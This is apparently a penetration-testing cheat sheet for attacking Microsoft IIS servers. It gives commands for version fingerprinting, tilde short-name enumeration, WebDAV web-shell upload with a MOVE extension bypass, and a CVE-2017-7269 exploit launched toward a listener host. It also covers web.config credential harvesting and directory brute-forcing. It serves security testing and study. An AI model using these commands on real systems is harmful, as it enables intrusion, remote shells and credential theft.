IIS (Internet Information Services)
What it is: Microsoft's web server, bundled with Windows Server. Serves ASP, ASPX, and static content. Common on Windows-based targets and often found alongside Active Directory environments.
Default ports: 80, 443, 8080
Vuln research:
Identify IIS version
Headers reveal version and OS — Determines attack surface
curl -sI http://$IP/ | grep -i server
nmap -sV -p 80,443 $IP
Example Output
Server: Microsoft-IIS/10.0
IIS 6.0 = Windows Server 2003 (very old, lots of exploits)
IIS 7.5 = Windows Server 2008 R2
IIS 8.5 = Windows Server 2012 R2
IIS 10.0 = Windows Server 2016/2019
IIS shortname enumeration
Tilde (~) vulnerability — Reveal hidden file/directory names
# Use IIS-ShortName-Scanner:
java -jar iis_shortname_scanner.jar http://$IP/
# Or manual:
curl -sI "http://$IP/~1/.aspx"
# 404 = exists, 400 = doesn't exist
IIS WebDAV exploitation
If WebDAV is enabled — Upload files directly
davtest -url http://$IP/
cadaver http://$IP/
# Upload ASPX web shell:
curl -T shell.aspx http://$IP/shell.aspx
# If .aspx blocked, upload as .txt then MOVE:
curl -X MOVE -H "Destination: http://$IP/shell.aspx" http://$IP/shell.txt
IIS 6.0 RCE (CVE-2017-7269)
Buffer overflow in WebDAV — Windows Server 2003 IIS 6.0
python2 iis6_exploit.py $IP 80 $LHOST 4444
# Or Metasploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
web.config for sensitive info
IIS configuration file — May contain credentials and connection strings
# Try to read via LFI or directory traversal:
curl http://$IP/web.config
# Common locations:
C:\inetpub\wwwroot\web.config
C:\web.config
Example Output
<connectionStrings>
<add connectionString="Server=localhost;Database=mydb;User Id=sa;Password=SuperSecret123;" />
</connectionStrings>
Default IIS files and directories
Check for information disclosure
# Files:
/iisstart.htm # Default page
/aspnet_client/ # ASP.NET client files
/web.config # Configuration
/_vti_bin/ # FrontPage extensions
/_vti_inf.html # FrontPage version info
# Brute force:
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt -x asp,aspx,config,txt